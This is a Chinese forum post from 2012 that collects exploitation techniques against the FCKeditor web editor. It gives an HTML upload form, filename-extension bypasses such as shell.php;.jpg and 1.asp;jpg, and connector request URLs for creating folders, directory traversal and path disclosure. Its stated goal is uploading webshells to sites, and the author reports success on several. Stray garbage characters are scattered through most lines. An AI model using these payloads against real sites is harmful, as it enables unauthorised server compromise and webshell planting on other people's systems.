Fckeditor漏洞利用总结
y$ }5 m; q- Y9 k0 T查看编辑器版本
9 t# O$ I' g6 j6 VFCKeditor/_whatsnew.html
/ e& T/ e8 a3 n/ l3 u& ^1 k—————————————————————————————————————————————————————————————3 K$ K1 E2 t9 O7 I; l; U% k1 q, N
- F) E" Y* W, X: K/ |! S
2. Version 2.2 版本
. l$ Q, F) l) T" |$ z7 E% \Apache+linux 环境下在上传文件后面加个.突破!测试通过。
) a _$ v, [; d—————————————————————————————————————————————————————————————7 S; A" T$ s' _+ x6 E$ F
0 |& W; V, X; f
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
* Z5 ?' L& M' K; h" V @5 H9 a<form id="frmUpload" enctype="multipart/form-data"
3 e# Q$ D( y. T3 r- Saction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>" ^* e) u, a) \1 @: M, |
<input type="file" name="NewFile" size="50"><br>; |/ p: o" L$ L
<input id="btnUpload" type="submit" value="Upload">1 U3 o& Q( Y. N( i5 {; O& R
</form>
1 _/ ^ K7 z/ t& ?( S) z—————————————————————————————————————————————————————————————- W. ^1 D6 j) M3 L ~
' Q, ~! G0 T% e
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
; H* Q0 Y5 N) d 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。0 B8 h2 I" g& V0 }* p
4.1:提交shell.php+空格绕过5 M- Y. A0 a& k6 D8 E4 B
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
3 M. L2 q3 ~! L$ F$ T& q4 D) ~ 4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
- U8 i& ~& g' B0 B—————————————————————————————————————————————————————————————1 \; R" M, y# S0 S5 E
! E1 _: x) R( L1 z' ^5. 突破建立文件夹0 l& y' v$ ^7 W4 y
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
0 Z' G0 f8 d' W# o+ KFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp% r3 o( o" K3 M( z7 s
—————————————————————————————————————————————————————————————; L9 b; Z1 R# ]8 L2 F
6 _9 X0 N% q ] f6. FCKeditor 中test 文件的上传地址1 |1 s/ g) c. A
FCKeditor/editor/filemanager/browser/default/connectors/test.html
. F" P+ M- U& }3 l! e" e; p; uFCKeditor/editor/filemanager/upload/test.html
& ], G8 q+ q# Q8 wFCKeditor/editor/filemanager/connectors/test.html3 G2 Q! o, C2 P
FCKeditor/editor/filemanager/connectors/uploadtest.html
6 b; F! C+ q7 u& p—————————————————————————————————————————————————————————————
( |$ O- G1 v* F
P' U1 B3 f5 o1 m/ B6 G" T7.常用上传地址, C" W% s( b4 d6 D& T, o$ _/ j
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
+ X8 ~! ]1 V7 V; ?0 a: i) GFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp7 B* A( H( Z# D/ m% R
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
0 f5 v; e, ~# l- V3 |JSP 版:
9 o7 f( e1 \% V, aFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp1 Q. L$ d' t5 K8 r u# N0 J2 E
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
* _ R1 b" r8 H9 y/ Q件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
* k+ a6 K4 i& L6 V( M5 z—————————————————————————————————————————————————————————————
+ l. d9 E! Y# Q* T6 G2 [9 }2 p$ c4 e9 M: _4 v, C. U {2 P1 s# c. w
8.其他上传地址
; O' l' J8 F, [& I3 o5 C8 CFCKeditor/_samples/default.html1 I$ r$ h7 B J; Z- ~8 [2 x
FCKeditor/_samples/asp/sample01.asp+ S. r `5 i5 d7 M' U5 s
FCKeditor/_samples/asp/sample02.asp# L6 b0 n& @ B0 b1 a
FCKeditor/_samples/asp/sample03.asp& _8 U9 r4 T+ P! R% |
FCKeditor/_samples/asp/sample04.asp/ ~2 c3 ]% o1 q8 T8 h: O
一般很多站点都已删除_samples 目录,可以试试。$ {& H- G2 d4 L
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
+ f! C$ a4 {+ }—————————————————————————————————————————————————————————————$ r# A$ S0 t7 N8 f, F& B+ L
& p+ j, I. P: A" K9.列目录漏洞也可助找上传地址
/ B" u- m+ t$ |% ^: i, Y( g8 W) vVersion 2.4.1 测试通过
m4 O3 s# g2 d! x修改CurrentFolder 参数使用 ../../来进入不同的目录
- }& m& h& O; C- }" D; ^" X7 K/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp5 d5 ?8 N" E5 ]# a2 T% O( t; ~
根据返回的XML 信息可以查看网站所有的目录。# Q2 H* T0 g2 L* T8 U+ d
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
/ f* w8 S: F# _也可以直接浏览盘符:: ` N1 b5 Z: I- A+ t0 s. E, c
JSP 版本:. w( M; d% D6 K$ j: Z- K! h
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
3 M4 ?) V. Y0 e9 o! U% |—————————————————————————————————————————————————————————————+ I8 B6 ^7 o2 S' I H" B/ q J2 H
! x# ^3 x* P& D3 I ^: l9 j10.爆路径漏洞
+ R3 g6 N1 B" ]FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
3 n+ B) F% F- S# `& [; z6 C! w—————————————————————————————————————————————————————————————0 M5 Y7 f8 N5 O0 ^+ S
v. m* M5 m) I- Z
11. FCKeditor 被动限制策略所导致的过滤不严问题
& g. Y5 ?' Z% }/ G) W& M" I/ Y" M4 F 影响版本: FCKeditor x.x <= FCKeditor v2.4.3
0 W8 i! x' o' \8 q脆弱描述:
- {8 j% c) F! Y4 P; e+ N/ ?1 ~FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
! ^" V# [# ~/ e0 k9 _2 b+ _html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
! B/ U9 _7 `" T& }. L' i3 V/ g: jFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!5 d5 K3 M: b$ z% U. S5 N A/ y
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
0 G" K5 c1 n6 ]! { 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!: O- l0 Y# |8 [
—————————————————————————————————————————————————————————————
+ s+ N1 o# F+ R8 |" d* D7 d7 F
) z/ |. q1 {0 _/ G/ l! A" \; s12.最古老的漏洞,Type文件没有限制!( B- I5 n$ ? \8 A" b: k& c, z
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
. [7 H" `# s) t2 ]3 q! N5 b) U—————————————————————————————————————————————————————————————
, I9 M( H) u3 f2 T. h
+ q* Y& g/ J h5 \) m/ W===============================================================================================================================================& l$ |+ F# T- b+ n6 |+ g g
+ R- m4 b! T2 e* d6 M9 t; a
FCK编辑器jsp版本漏洞:# r n3 _% ?9 K
+ i+ q& M( ]& v0 x1 }( X p+ B, P4 t+ k) e8 x
http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
8 n7 R( \( @: P r8 h( @% M1 _/ K7 j' [, q9 f) I( t
上传马所在目录
* X" G6 E. \6 g5 E( IFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
& Z3 o8 N8 G$ y9 A. X4 Z3 _4 c上传shell的地址:5 y- u. o* Z1 X! ]: z" |
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
1 F; N [6 Y5 D0 Q/ |跟版本有关系.并不是百分百成功. 测试成功几个站.( A3 S7 j/ d) c' h1 Q
不能通杀.很遗憾.3 `+ `' M5 e6 j
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector [' d. Y5 m: f, e$ o
如果以上地址不行可以试试
9 {1 u8 N" z' T. a' c, ^9 yFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
: q1 H" J/ m, w/ E* {6 sFCKeditor/_samples/% y2 G3 {9 P0 ]; [! n
FCKeditor/_samples/default.html0 B1 f( f& @0 Y5 i$ u T* p
FCKeditor/editor/fckeditor.htm" ~; p0 J# F- l1 b
FCKeditor/editor/fckdialog.html
8 D' i4 C% z6 f5 i0 v0 u, G$ M3 R I% [, v, V7 z
$ ^6 ^% p! w# J3 j9 E3 m! S5 G3 O" |# w! S' w
解析漏洞+未重命名文件时上传漏洞 1.asp;jpg: q9 I' l$ o, `0 [+ M
|
发表于 2012-9-13 17:01:39
收藏
支持
反对